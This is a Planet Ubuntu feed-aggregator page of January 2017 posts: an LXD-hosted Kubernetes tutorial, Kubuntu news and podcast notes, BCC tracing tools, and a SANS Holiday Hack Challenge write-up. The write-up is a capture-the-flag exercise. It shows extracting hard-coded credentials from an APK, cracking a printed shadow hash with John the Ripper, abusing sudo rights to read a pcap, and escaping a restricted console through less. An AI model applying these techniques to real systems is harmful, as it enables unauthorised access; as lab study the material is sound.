Feed aggregator

Stéphane Graber: Running Kubernetes inside LXD

Planet Ubuntu - Fri, 01/13/2017 - 03:35

Introduction

For those who haven’t heard of Kubernetes before, it’s defined by the upstream project as:

Kubernetes is an open-source system for automating deployment, scaling, and management of containerized applications.

It groups containers that make up an application into logical units for easy management and discovery. Kubernetes builds upon 15 years of experience of running production workloads at Google, combined with best-of-breed ideas and practices from the community.

It is important to note the “applications” part in there. Kubernetes deploys a set of single application containers and connects them together. Those containers will typically run a single process and so are very different from the full system containers that LXD itself provides.

This blog post will be very similar to one I published last year on running OpenStack inside a LXD container. Similarly to the OpenStack deployment, we’ll be using conjure-up to setup a number of LXD containers and eventually run the Docker containers that are used by Kubernetes.

Requirements

This post assumes you’ve got a working LXD setup, providing containers with network access and that you have at least 10GB of space for the containers to use and at least 4GB of RAM.

Outside of configuring LXD itself, you will also need to bump some kernel limits with the following commands:

sudo sysctl fs.inotify.max_user_instances=1048576
sudo sysctl fs.inotify.max_queued_events=1048576
sudo sysctl fs.inotify.max_user_watches=1048576
sudo sysctl vm.max_map_count=262144

Setting up the container

Similarly to OpenStack, the conjure-up deployed version of Kubernetes expects a lot more privileges and resource access than LXD would typically provide. As a result, we have to create a privileged container, with nesting enabled and with AppArmor disabled.

This means that few of LXD’s security features will still be in effect on this container. Depending on how you feel about this, you may choose to run it on a different machine.

Note, however, that all of this remains better than instructions that would have you install everything directly on your host machine, if only by making it very easy to remove it all in the end.

lxc launch ubuntu:16.04 kubernetes -c security.privileged=true -c security.nesting=true -c linux.kernel_modules=ip_tables,ip6_tables,netlink_diag,nf_nat,overlay -c raw.lxc=lxc.aa_profile=unconfined
lxc config device add kubernetes mem unix-char path=/dev/mem

Then we need to add a couple of PPAs and install conjure-up, the deployment tool we’ll use to get Kubernetes going.

lxc exec kubernetes -- apt-add-repository ppa:conjure-up/next -y
lxc exec kubernetes -- apt-add-repository ppa:juju/stable -y
lxc exec kubernetes -- apt update
lxc exec kubernetes -- apt dist-upgrade -y
lxc exec kubernetes -- apt install conjure-up -y

And the last setup step is to configure LXD networking inside the container:

lxc exec kubernetes -- lxd init

Answer with the default for all questions, except for:

  • Use the “dir” storage backend (“zfs” doesn’t work in a nested container)
  • Do NOT configure IPv6 networking (conjure-up/juju don’t play well with it)

And that’s it for the container configuration itself, now we can deploy Kubernetes!

Deploying Kubernetes with conjure-up

As mentioned earlier, we’ll be using conjure-up to deploy Kubernetes.
This is a nice, user-friendly tool that interfaces with Juju to deploy complex services.

Start it with:

lxc exec kubernetes -- sudo -u ubuntu -i conjure-up

  • Select “Kubernetes Core”
  • Then select “localhost” as the deployment target (uses LXD)
  • And hit “Deploy all remaining applications”

This will now deploy Kubernetes. The whole process can take well over an hour depending on what kind of machine you’re running this on. You’ll see all services getting a container allocated, then getting deployed and finally interconnected.

Once the deployment is done, a few post-install steps will appear. These will import some initial images, set up SSH authentication, configure networking and finally give you the IP address of the dashboard.

Interact with your new Kubernetes

We can ask juju to deploy a new Kubernetes workload, in this case 5 instances of “microbot”:

ubuntu@kubernetes:~$ juju run-action kubernetes-worker/0 microbot replicas=5
Action queued with id: 1d1e2997-5238-4b86-873c-ad79660db43f

You can then grab the service address from the Juju action output:

ubuntu@kubernetes:~$ juju show-action-output 1d1e2997-5238-4b86-873c-ad79660db43f
results:
  address: microbot.10.97.218.226.xip.io
status: completed
timing:
  completed: 2017-01-13 10:26:14 +0000 UTC
  enqueued: 2017-01-13 10:26:11 +0000 UTC
  started: 2017-01-13 10:26:12 +0000 UTC

Now actually using the Kubernetes tools, we can check the state of our new pods:

ubuntu@kubernetes:~$ ./kubectl get pods
NAME                             READY     STATUS              RESTARTS   AGE
default-http-backend-w9nr3       1/1       Running             0          21m
microbot-1855935831-cn4bs        0/1       ContainerCreating   0          18s
microbot-1855935831-dh70k        0/1       ContainerCreating   0          18s
microbot-1855935831-fqwjp        0/1       ContainerCreating   0          18s
microbot-1855935831-ksmmp        0/1       ContainerCreating   0          18s
microbot-1855935831-mfvst        1/1       Running             0          18s
nginx-ingress-controller-bj5gh   1/1       Running             0          21m

After a little while, you’ll see everything’s running:

ubuntu@kubernetes:~$ ./kubectl get pods
NAME                             READY     STATUS    RESTARTS   AGE
default-http-backend-w9nr3       1/1       Running   0          23m
microbot-1855935831-cn4bs        1/1       Running   0          2m
microbot-1855935831-dh70k        1/1       Running   0          2m
microbot-1855935831-fqwjp        1/1       Running   0          2m
microbot-1855935831-ksmmp        1/1       Running   0          2m
microbot-1855935831-mfvst        1/1       Running   0          2m
nginx-ingress-controller-bj5gh   1/1       Running   0          23m

At which point, you can hit the service URL with:

ubuntu@kubernetes:~$ curl -s http://microbot.10.97.218.226.xip.io | grep hostname
<p class="centered">Container hostname: microbot-1855935831-fqwjp</p>

Running this multiple times will show you different container hostnames as you get load-balanced across those 5 new instances.
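A quick way to see the load balancing in action is to tally which pod answered each of a batch of requests. This is a sketch of the counting pipeline only: `fetch` is a stand-in for the real call (which would be the `curl -s … | grep` command above), using made-up sample responses so the pipeline itself is clear.

```shell
# `fetch` stands in for repeated runs of:
#   curl -s http://microbot.10.97.218.226.xip.io | grep -o 'microbot-[a-z0-9-]*'
# (sample pod names below are illustrative)
fetch() { printf 'microbot-1855935831-%s\n' cn4bs mfvst cn4bs; }

# Count how many requests each pod served, busiest first:
fetch | sort | uniq -c | sort -rn
```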

Conclusion

Similar to OpenStack, conjure-up combined with LXD makes it very easy to deploy rather complex software in a self-contained way.

This isn’t the kind of setup you’d want to run in a production environment, but it’s great for developers, demos and whoever wants to try those technologies without investing into hardware.

Extra information

The conjure-up website can be found at: http://conjure-up.io
The Juju website can be found at: http://www.ubuntu.com/cloud/juju

The main LXD website is at: https://linuxcontainers.org/lxd
Development happens on Github at: https://github.com/lxc/lxd
Mailing-list support happens on: https://lists.linuxcontainers.org
IRC support happens in: #lxcontainers on irc.freenode.net
Try LXD online: https://linuxcontainers.org/lxd/try-it

Jorge Castro: Fresh Kubernetes documentation available now

Planet Ubuntu - Tue, 01/10/2017 - 12:34

Over the past few months our team has been working real hard on the Canonical Distribution of Kubernetes. This is a pure-upstream distribution of k8s with our community’s operational expertise bundled in.

It means that we can use one set of operational code to get the same deployment on GCE, AWS, Azure, Joyent, OpenStack, and Bare Metal.

Like most young distributed systems, Kubernetes isn’t exactly famous for its ease of use, though there has been tremendous progress over the past 12 months. Our documentation on Kubernetes was nearly non-existent and it became obvious that we had to dive in there and bust it out. I’ve spent some time fixing it up and it’s been recently merged.

You can find the Official Ubuntu Guides in the “Create a cluster” section. We’re taking what I call a “sig-cluster-lifecycle” approach to this documentation – the pages are organized into lifecycle topics based on what an operator would do. So “Backups” or “Upgrades” instead of one big page with sections. This will allow us to grow each section based on the expertise we learn on k8s for that given task.

Over the next few months (and hopefully for Kubernetes 1.6) we will slowly be phasing out the documentation on our individual charm and layer pages to reduce duplication and move to a pure upstream workflow.

On behalf of our team we hope you enjoy Kubernetes, and if you’re running into issues please let us know or you can find us in the Kubernetes slack channels.

The Fridge: Ubuntu Weekly Newsletter Issue 494

Planet Ubuntu - Tue, 01/10/2017 - 09:06

Welcome to the Ubuntu Weekly Newsletter. This is issue #494 for the week January 2 – 8, 2017, and the full version is available here.

In this issue we cover:

This issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Paul White
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution ShareAlike 3.0 License.

Ubuntu Weekly Newsletter Issue 494

The Fridge - Tue, 01/10/2017 - 09:06

Welcome to the Ubuntu Weekly Newsletter. This is issue #494 for the week January 2 – 8, 2017, and the full version is available here.

In this issue we cover:

This issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Paul White
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution ShareAlike 3.0 License.

Kubuntu General News: Plasma 5.8.4 and KDE Frameworks 5.28.0 now available in Backports for Kubuntu 16.04 and 16.10

Planet Ubuntu - Mon, 01/09/2017 - 13:01

The Kubuntu Team announces the availability of Plasma 5.8.4 and KDE Frameworks 5.28.0 on Kubuntu 16.04 (Xenial) and 16.10 (Yakkety) through our Backports PPA.

Plasma 5.8.4 Announcement:
https://www.kde.org/announcements/plasma-5.8.4.php
How to get the update (in the commandline):

  1. sudo apt-add-repository ppa:kubuntu-ppa/backports
  2. sudo apt update
  3. sudo apt full-upgrade -y

If you have been testing this upgrade by using the backports-landing PPA, please remove it first before doing the upgrade to backports. Do this in the commandline:

sudo apt-add-repository --remove ppa:kubuntu-ppa/backports-landing

Please report any bugs you find on Launchpad (for packaging problems) and at http://bugs.kde.org (for bugs in the KDE software itself).

Leo Arias: Call for testing: IPFS

Planet Ubuntu - Fri, 01/06/2017 - 08:58

Happy new year Ubunteros and Ubunteras!

If you have been following our testing days, you will know by now that our intention is to get more people contributing to Ubuntu and free software projects, and to help them get started through testing and related tasks. So, we will be making frequent calls for testing where you can contribute and learn. Educational AND fun ^_^

To start the year, I would like to invite you to test the IPFS candidate snap. IPFS is a really interesting free software project for distributed storage. You can read more about it and watch a demo on the IPFS website.

We have pushed a nice snap with their latest stable version to the candidate channel in the store. But before we publish it to the stable channel we would like to get more people testing it.

You can get a clean and safe environment to test following some of the guides you'll find on the summaries of the past testing days.

Or, if you want to use your current system, you can just do:

$ sudo snap install ipfs --candidate

I have written a gist with a simple guide to get started testing it.

If you finish that successfully and still have more time, or are curious about ipfs, please continue with an exploratory testing session. The idea here is just to execute random commands, try unusual inputs and just play around.

You can get ideas from the IPFS docs.

When you are done, please send me an email with your results and any comments. And if you get stuck or have any kind of question, please don't hesitate to ask. Remember that we welcome everybody.

Colin King: BCC: a powerful front end to extended Berkeley Packet Filters

Planet Ubuntu - Thu, 01/05/2017 - 08:21
The BPF Compiler Collection (BCC) is a toolkit for building kernel tracing tools that leverage the functionality provided by the Linux extended Berkeley Packet Filters (BPF).

BCC allows one to write BPF programs with front-ends in Python or Lua with kernel instrumentation written in C.  The instrumentation code is built into sandboxed eBPF byte code and is executed in the kernel.

The BCC github project README file provides an excellent overview and description of BCC and the various available BCC tools. Building BCC from scratch can be a bit time consuming; however, the good news is that the BCC tools are now available as a snap, so BCC can be quickly and easily installed using:

sudo snap install --devmode bcc

There are currently over 50 BCC tools in the snap, so let's have a quick look at a few:

cachetop allows one to view the top page cache hit/miss statistics. To run this use:

sudo bcc.cachetop



The funccount tool allows one to count the number of times specific functions get called.  For example, to see how many kernel functions with the name starting with "do_" get called per second one can use:

sudo bcc.funccount "do_*" -i 1


To see how to use all the options in this tool, use the -h option:

sudo bcc.funccount -h

I've found the funccount tool to be especially useful to check on kernel activity by checking on hits on specific function names.

The slabratetop tool is useful to see the active kernel SLAB/SLUB memory allocation rates:

sudo bcc.slabratetop


If you want to see which process is opening specific files, you can snoop on open system calls using the opensnoop tool:

sudo bcc.opensnoop -T


Hopefully this will give you a taste of the useful tools that are available in BCC (I have barely scratched the surface in this article).  I recommend installing the snap and giving it a try.

As it stands, BCC provides a useful mechanism to develop BPF tracing tools, and I look forward to regularly updating the BCC snap as more tools are added to BCC. Kudos to Brendan Gregg for BCC!

Kubuntu Podcast News: Kubuntu-Podcast #15 – Yakkety and Kubuntu Ninjas

Planet Ubuntu - Thu, 01/05/2017 - 01:21

Show Audio Feeds

MP3: http://feeds.feedburner.com/KubuntuPodcast-mp3

OGG: http://feeds.feedburner.com/KubuntuPodcast-ogg

Pocket Casts links
  OGG
  MP3

Show Hosts

Ovidiu-Florin Bogdan

Rick Timmis

Aaron Honeycutt (Video/Audio Podcast Production)

Intro

What have we (the hosts) been doing ?

  • Aaron
    • Kicking Rick’s merges to the curb
    • Kubuntu Manual / Documentation
  • Rick
    • Kubuntu Party
    • Kubuntu Dojo
    • Kubuntu Manual / Documentation
  • Ovidiu
    • Projects
    • Dockerising Open Source Applications (ReviewBoard, AgileFant, FixMyStreet)
    • Adding Images to Feedburner

Sponsor: Big Blue Button

Those of you who have attended the Kubuntu parties will have seen our Big Blue Button conference and online education service.

Video, Audio, Presentation, Screenshare and whiteboard tools.

We are very grateful to Fred Dixon and the team at BigBlueButton.org; go check out their project.

Kubuntu News Elevator Picks

Identify, install and review one app each from the Discover software center and do a short screen demo and review.

In Focus Sponsor: Linode


Linode, an awesome VPS with super-fast SSDs, fast data connections, and top-notch support. We have worked out a sponsorship for a server to build packages quicker and get them to our users faster.

Instantly deploy and get a Linode Cloud Server up and running in seconds with your choice of Linux distro, resources, and node location.

  • SSD Storage
  • 40Gbit Network
  • Intel E5 Processors

BIG SHOUT OUT to Linode for working with us!

Kubuntu Developer Feedback
  • Linode Server – LXD containers for others to use
    • 1 container being used by one of the packagers
    • 2 containers acting as KCI slave nodes
    • With this resource we can build one tree-level dependency at once, which is around 100 packages and takes around 1 hour on average.
    • There is also enough capacity left that we can provide additional containers for Ninjas to use for packaging.
  • For Yakkety, we now have Qt 5.6.1, Frameworks and Plasma 5.7.2, and Applications 16.04.3 is almost done; we’re looking for testers. The team is looking forward to Applications 16.08, just waiting for an upstream release to get the PIM packages.
  • For Xenial, Plasma 5.7.2 has moved a little further forward, but there is much to be done in backports to achieve this.
  • Kubuntu CI System – Yofel has been working hard on improving the CI system, in addition to adding Slave Nodes, thanks to Linode too.
    • The next stage was to get the build jobs in order. This has meant we have dropped 32-bit builds from the CI, but we’ll continue to provide x86 32-bit builds of Kubuntu. Focusing on only 64-bit builds has resolved many errors and failures.
    • They did run into an interesting error, where the Linode slave was so powerful it tried to open 20 concurrent connections to the KDE Git repo, and was promptly closed off by the 5 connection limit. A nice problem to have.
  • Yofel will continue to work on the stable CI builds by getting a set of working configurations. The move back to Launchpad brings many benefits, but right now it has created a lot of challenges that the team is working through.
  • 2 additional Ninjas have been added to the team:
    • Rik Mills
    • Simon Quigley
  • Clivejo gave a big shout out to the 2 new Ninjas; many thanks for their excellent work and effort.
  • As always, we’re desperate for testing of daily and beta builds of Yakkety
  • Bug Crush Sprint required http://qa.kubuntu.co.uk/
In Show Notes

Rick doing GOOD STUFF: http://picosong.com/Dk8m/

Outro

How to contact the Kubuntu Team:

How to contact the Kubuntu Podcast Team:

Kubuntu Podcast News: Kubuntu Podcast 17

Planet Ubuntu - Thu, 01/05/2017 - 01:02

Show Audio Feeds

MP3: http://feeds.feedburner.com/KubuntuPodcast-mp3

OGG: http://feeds.feedburner.com/KubuntuPodcast-ogg

Pocket Casts links

OGG

MP3

Show Hosts

Ovidiu-Florin Bogdan

Rick Timmis

Aaron Honeycutt (Video/Audio Podcast Production)

Intro

What have we (the hosts) been doing ?

  • Aaron
    • Getting ready for Hurricane Matt in Florida
  • Rick
    • ???
  • Ovidiu
    • ???
Sponsor: Big Blue Button

Those of you who have attended the Kubuntu parties will have seen our Big Blue Button conference and online education service.

Video, Audio, Presentation, Screenshare and whiteboard tools.

We are very grateful to Fred Dixon and the team at BigBlueButton.org; go check out their project.

Kubuntu News Elevator Picks

Identify, install and review one app each from the Discover software center and do a short screen demo and review.

In Focus Sponsor: Linode

Linode, an awesome VPS with super-fast SSDs, fast data connections, and top-notch support. We have worked out a sponsorship for a server to build packages quicker and get them to our users faster.

Instantly deploy and get a Linode Cloud Server up and running in seconds with your choice of Linux distro, resources, and node location.

  • SSD Storage
  • 40Gbit Network
  • Intel E5 Processors

BIG SHOUT OUT to Linode for working with us!

Kubuntu Developer Feedback
  • Clive became a Kubuntu Developer!!!
Game On 
  • The Linux Gamer interview

Questions about Gaming on Linux:

  1. Who are you and what do you do?
  2. What makes a Game developer want to bring their AAA game to Linux?
  3. Have stores like Humble Bundle and Indie Gala helped Linux gaming?
  4. Are Linux graphics drivers getting better?
  5. What are your thoughts on Vulkan?

TLG YouTube: https://www.youtube.com/user/tuxreviews

TLG Patreon: https://www.patreon.com/thelinuxgamer

Listener Feedback
  • From: Snowhog @ https://www.kubuntuforums.net/

    I just want to express my thanks for all the hard work developers and testers put into the Kubuntu/KDE/Plasma projects. So few of you; so many of us, and the “us’s” always seem to want ‘more’, and tend to, more often than not, complain about what isn’t included and what isn’t working instead of praising that which is and does.

    For me, and with very few exceptions since I first started using Kubuntu in 2007, Kubuntu has simply just worked. I am constantly amazed that such a robust and feature filled operating system is available to everyone for free (free to me). The developers and testers simply don’t receive the credit and gratitude you all have earned.

    So, again, from one of the “us’s”, THANK YOU!

    Please feel free to pass this along.
Contact Us

How to contact the Kubuntu Team:

How to contact the Kubuntu Podcast Team:

David Tomaschik: SANS Holiday Hack Challenge 2016

Planet Ubuntu - Thu, 01/05/2017 - 01:00
Introduction

This is my second time playing the SANS holiday hack challenge. It was a lot of fun, and probably took me about 8-10 hours over a period of 2-3 days, not including this writeup. Ironically, this writeup took me longer than actually completing the challenge – which brings me to a note about some of the examples in the writeup. Please ignore any dates or timelines you might see in screengrabs and other notes – I was so engrossed in playing that I did a terrible job of documenting as I went along, so a lot of these I went back and did a 2nd time (of course, knowing the solution made it a bit easier) so I could provide the quality of writeup I was hoping to.

Most importantly, a huge shout out to all the SANS Counter Hack guys – I can only imagine how much work goes into building an educational game like this and making the challenges realistic and engrossing. I’ve built wargames & similar apps for work, but never had to build them into a story – let alone a story that spans multiple years. I tip my hat to their dedication and success!

Part 1: A Most Curious Business Card

We start with the Dosis children again (I can’t read that name without thinking about DOCSIS, but I see no cable modems here…) who have found Santa’s bag and business card, signs of a struggle, but no Santa!

Looking at the business card, we see that Santa seems to be into extensive social media use. On his twitter account, we see a large number of posts (350), mostly composed of Christmas-themed words (JOY, PEACEONEARTH, etc.), but occasionally with a number of symbols in the center. At first I thought it might be some kind of encoding, so I decided to download the tweets to a file and examine them as plaintext. I did this with a bit of javascript to pull the right elements into a single file. I was about to start trying various decoding techniques when I happened to notice a pattern:

Well, perhaps the hidden message is “BUG BOUNTY”. (Question #1) (Image wrapped for readability.) I’m not sure what to do with it at this point, but perhaps it will become clear later.

Let’s switch to instagram and take a look there. The first two photos appear unremarkable, but the third one is cluttered with potential clues. One of Santa’s elves (Hermey) is apparently as good at keeping a clean desk as I am – just ask my coworkers! Fortunately they don’t Instagram shame me. :)

Using our “enhance” button from the local crime-solving TV show, we find a couple of clues.

We have a domain (or at least part of one) from an nmap report, and a filename. I wonder if they go together: https://www.northpolewonderland.com/SantaGram_4.2.zip. Indeed they do, and we have a zip file. Unzipping it, we discover it’s encrypted. Unsure what else to try, I try variations of “BUG BOUNTY” from Twitter, and it works for me. (Turns out the password is lower case, though.) Inside the zip file, we find an APK for SantaGram with SHA-1 78f950e8553765d4ccb39c30df7c437ac651d0d3. (Question #2)

Part 2: Awesome Package Konveyance

With APK in hand, we decide to start hunting for interesting artifacts inside. With a simple apktool d, we extract its contents, resulting in resources, smali code, and a handful of other files. Hunting for usernames and passwords, I decide to use ack (http://beyondgrep.com/), a grep-like tool with some enhanced features. A quick search with the strings username and password reveals a number of potential options. I could check manually, but well, I’m lazy. Instead, I use ack -A 5, which shows 5 lines of context after each match. Paging through these results, I spot a likely candidate:

Inside this same smali file, I find a password a few lines further down:

:try_start_0
const-string v1, "username"
const-string v2, "guest"
invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
const-string v1, "password"
const-string v2, "busyreindeer78"

Now we have a username and password pair: guest:busyreindeer78. (Question #3) Cool. I don’t know what they’re good for, but collecting credentials can always come in handy later.
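The same context-search works with plain grep if ack isn’t at hand. A minimal sketch on a made-up smali fragment (on the real tree you would point it at the apktool output directory; the file name here is hypothetical):

```shell
# Hypothetical sample standing in for the real apktool output:
mkdir -p demo/smali
cat > demo/smali/sample.smali <<'EOF'
const-string v1, "username"
const-string v2, "guest"
const-string v1, "password"
const-string v2, "busyreindeer78"
EOF

# -r recurse, -n line numbers, -A 1 shows the line after each match,
# which in smali is where the value for the preceding key lives:
grep -rn -A 1 -e '"username"' -e '"password"' demo/smali
```

ack’s `-A` flag behaves the same way; grep just needs `-r` spelled out.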

An audio file is mentioned. I don’t know if it’s embedded in source, a resource by itself, or what, but I’m going to take a guess that it’s a large file. Find is useful in these cases:

% find . -size +100k
./smali/android/support/v7/widget/StaggeredGridLayoutManager.smali
./smali/android/support/v7/widget/ao.smali
./smali/android/support/v7/widget/Toolbar.smali
./smali/android/support/v7/widget/LinearLayoutManager.smali
./smali/android/support/v7/a/l.smali
./smali/android/support/v4/b/s.smali
./smali/android/support/v4/widget/NestedScrollView.smali
./smali/android/support/design/widget/CoordinatorLayout.smali
./smali/com/parse/ParseObject.smali
./res/drawable/launch_screen.png
./res/drawable/demo_img.jpg
./res/raw/discombobulatedaudio1.mp3

There are quite a few more files than I expected in the relevant size range, but it’s easy to find the MP3 file in the bunch with just a glance. I guess the name of the audio file is discombobulatedaudio1.mp3. (Question #4.)

Part 3: A Fresh-Baked Holiday Pi

After running around for a while, hunting for pieces of the Cranberry Pi, I’m able to put the pieces together, and the helpful Holly Evergreen provides a link to the Cranberry Pi image.

After downloading the image, I’m able to map the partitions (using a great tool named kpartx) and mount the filesystem, then extract the password hash.

% sudo kpartx -av ./cranbian-jessie.img
add map loop3p1 (254:7): 0 129024 linear 7:3 8192
add map loop3p2 (254:8): 0 2576384 linear 7:3 137216
% sudo mount /dev/mapper/loop3p2 data
% sudo grep cranpi data/etc/shadow
cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:17140:0:99999:7:::

This is a standard Unix SHA-512 crypt hash – slow, but workable. Fortunately, Minty Candycane of Rudolph’s Red Team has helped us out there by pointing to John the Ripper and the RockYou password list. (Shout out to @iagox86 for hosting the best collection of password lists around.)
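The workflow from here is short. A sketch, with the hash abbreviated and the actual crack commented out since it takes a while (the `--wordlist` flag is john’s standard wordlist mode; adjust paths to your own setup):

```shell
# Abbreviated copy of the shadow entry pulled out above:
line='cranpi:$6$2AXLbEoG$zZlWSwrUSD02...:17140:0:99999:7:::'

# Field 2 of the colon-separated entry is the crypt string; its first
# $-delimited id names the scheme ($6$ = SHA-512-crypt, deliberately slow):
echo "$line" | cut -d: -f2 | cut -d'$' -f2
# → 6

# Then, on a box with John the Ripper and the RockYou list:
# echo "$line" > cranpi.shadow
# john --wordlist=rockyou.txt cranpi.shadow
# john --show cranpi.shadow
```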

Throwing the hash up on a virtual machine with a few cores and running john with the rockyou list for a little while, we discover Santa’s top secret password: yummycookies. (Question #5) After we let Holly Evergreen know that we’ve found the password, she tells us that we’ll be able to use the terminals around the North Pole to unlock the doors. Time to head to the terminals.

Terminal: Elf House #2

The first door I ran to is Elf House #2. Opening the terminal, we’re told to find the password in the /out.pcap file, but we’re running as the user scratchy, and the user itchy owns the file. After spending some time over-thinking the problem, I run sudo -l to see if I can run anything as root or itchy and discover some useful tools:

(itchy) NOPASSWD: /usr/sbin/tcpdump
(itchy) NOPASSWD: /usr/bin/strings

Like any good hacker, I go straight to strings and discover the first part of the password:

sudo -u itchy /usr/bin/strings /out.pcap
…
<input type="hidden" name="part1" value="santasli" />
…

I played around with tcpdump to try to extract the second part as a file, but could never get anything I was able to reconstruct into anything meaningful. I thought about trying to exfiltrate the file to my local box for wireshark, but I decided I wanted to push to solve it only with the tools I had available to me. I look at my options with tcpdump and try the -A flag (giving ASCII output) to see what I can see. Paging through it, I noticed an area where I saw the string “part2”, but only in every other character. I gave strings another try, this time checking for little-endian UTF-16 characters:

sudo -u itchy /usr/bin/strings -e l /out.pcap
part2:ttlehelper
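The -e l flag tells GNU strings to look for 16-bit little-endian character sequences instead of plain ASCII. It’s easy to convince yourself this works on synthetic data (a sketch, assuming iconv and GNU strings are available):

```shell
# Encode an ASCII string as little-endian UTF-16, then recover it:
printf 'part2:ttlehelper' | iconv -f ASCII -t UTF-16LE > u16.bin
strings -e l u16.bin
# → part2:ttlehelper
```

Plain `strings u16.bin` would find nothing here, since every other byte is a NUL.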

Putting the parts together, we have “santaslittlehelper” and we’re in!

Terminal: Workshop

The first of two doors in the workshop is up the candy-cane striped stairs.

The challenge here is simple, find the password in the deeply nested directory structure. I decided to see what files existed at all with a quick find:

$ find . -type f
./.bashrc
./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'/key_for_the_door.txt
./.profile
./.bash_logout

That was easy, but I suppose we need the contents. I don’t want to deal with all the special characters and directories (remember, I’m lazy) so I just let find do the work for me:

$ find . -type f -name 'key*' -exec cat {} \;
key: open_sesame
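-exec hands each raw pathname straight to cat, so none of the quotes, spaces, or backslashes ever get re-parsed by the shell. Reproducing the trick against a similarly hostile, made-up tree:

```shell
# Build a directory with deliberately awkward characters in its name:
mkdir -p "demo2/Don't Look Here!/.doormat/\\ "
echo 'key: open_sesame' > "demo2/Don't Look Here!/.doormat/\\ /key_for_the_door.txt"

# find passes the path to cat directly; no shell quoting is involved:
find demo2 -type f -name 'key*' -exec cat {} \;
# → key: open_sesame
```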

This leads us into Santa’s office, which presents us with another terminal on the back wall.

Terminal: Santa’s Office

As I said, we’re in Santa’s office with another terminal on the back wall, but no obvious door. It turns out the bookcase there is the hidden door!

Getting back to the terminal, I’m prompted with GREETINGS PROFESSOR FALKEN. Immediately, I recognize this as a line from the WOPR in the movie WarGames. After a few errant entries, I realize it wants me to dialog with it in exactly the same way as the movie. (This was a painstaking exercise in transcribing YouTube.)

GREETINGS PROFESSOR FALKEN.
Hello.
HOW ARE YOU FEELING TODAY?
I'm fine. How are you?
EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73?
People sometimes make mistakes.
YES THEY DO. SHALL WE PLAY A GAME?
Love to. How about Global Thermonuclear War?
WOULDN'T YOU PREFER A GOOD GAME OF CHESS?
Later. Let's play Global Thermonuclear War.
FINE

[ASCII-art world map of the UNITED STATES and the SOVIET UNION]

WHICH SIDE DO YOU WANT?
1. UNITED STATES
2. SOVIET UNION
PLEASE CHOOSE ONE: 2
AWAITING FIRST STRIKE COMMAND
-----------------------------
PLEASE LIST PRIMARY TARGETS BY CITY AND/OR COUNTRY NAME:
Las Vegas
LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE:
LOOK AT THE PRETTY LIGHTS

That was painful, but not difficult. It was incredibly unforgiving when it comes to typos, even a single space would require retyping the sentence (though fortunately not the whole transaction).

Through the door, we find ourselves in “The Corridor” with another locked door, but this time, no terminal. I tried a few obvious passwords anyway, but had no luck with that.

Terminal: Workshop (Reindeer)

There’s a second door in the workshop, next to a few of Santa’s reindeer. (If anyone figures out whether reindeer really moo, please let me know…)

Find the passphrase from the wumpus. Play fair or cheat; it's up to you.

I was going to cheat, but first I wanted to get the lay of the game, so I wandered a bit and fired a few arrows, and happened to hit the wumpus – no cheating necessary! (I’m not sure if randomly playing is “playing fair”, but hacking is about what works!)

Move or shoot? (m-s) s
6
*thwock!* *groan* *crash*

A horrible roar fills the cave, and you realize, with a smile, that you
have slain the evil Wumpus and won the game! You don't want to tarry for
long, however, because not only is the Wumpus famous, but the stench of
dead Wumpus is also quite well known, a stench plenty enough to slay the
mightiest adventurer at a single whiff!!

Passphrase:
WUMPUS IS MISUNDERSTOOD

Terminal: Workshop - Train Station

On the train, there’s another terminal. It proclaims to be the Train Management Console: AUTHORIZED USERS ONLY. Running a few commands, I soon discovered that BRAKEOFF works, but START requires a password which I don’t have. Looking at the HELP documentation, I noticed something odd:

Help Document for the Train

**STATUS** option will show you the current state of the train (brakes, boiler, boiler temp, coal level)
**BRAKEON** option enables the brakes. Brakes should be enabled at every stop and while the train is not in use.
**BRAKEOFF** option disables the brakes. Brakes must be disabled before the **START** command will execute.
**START** option will start the train if the brake is released and the user has the correct password.
**HELP** brings you to this file. If it's not here, this console cannot do it, unLESS you know something I don't.

It seemed strange that unLESS had that unusual capitalization, but then I realized the help document was probably being displayed with GNU less. Did that have shell functionality, similar to vim and other editors? The more-or-less universal command to start a shell is a bang (!), so I decided to give it a try, and was dropped into a shell. At first I thought about looking for the password (and you can discover it), but then I realized I could just run ActivateTrain directly.

It turns out the train is a time machine to 1978. (I wonder if that’s related to the guest password we found earlier – busyreindeer78. Guess we’ll find out soon.)

1978: Finding Santa

So I arrived in 1978 and quite frankly, had no idea what I should do. I still needed more NetWars challenge coins (man, what I wouldn’t give for a real-life NetWars challenge coin, but since I’ve never been to a NetWars event, my trophy case remains empty), so I decided to wander and find whatever I found. Guess what I found? Santa! He was in the DFER (Dungeon for Errant Reindeer), but could not remember how he got there.

Part 4: My Gosh… It’s Full of Holes

If we use ack again to find URLs containing “northpolewonderland.com” (a bit of a guess, based on having seen one or two of these URLs while looking for credentials), we find a number of candidate URLs:

% ack -o "[a-z]+\.northpolewonderland\.com" values/strings.xml
24:analytics.northpolewonderland.com
25:analytics.northpolewonderland.com
29:ads.northpolewonderland.com
32:dev.northpolewonderland.com
34:dungeon.northpolewonderland.com
35:ex.northpolewonderland.com
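As an aside, ack isn't installed everywhere; plain GNU grep can do the same print-only-the-match extraction with -o. The input line below is a made-up stand-in for a line of values/strings.xml (the string name is hypothetical):

```shell
# grep -oE prints only the part of each line matching the pattern,
# just like ack -o
echo '<string name="analytics_launch_url">https://analytics.northpolewonderland.com/report.php</string>' \
  | grep -oE '[a-z]+\.northpolewonderland\.com'   # → analytics.northpolewonderland.com
```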

We can then retrieve the IP addresses for each of these hosts using our trusty DNS tool dig:

% dig +short {ads,analytics,dev,dungeon,ex}.northpolewonderland.com
104.198.221.240
104.198.252.157
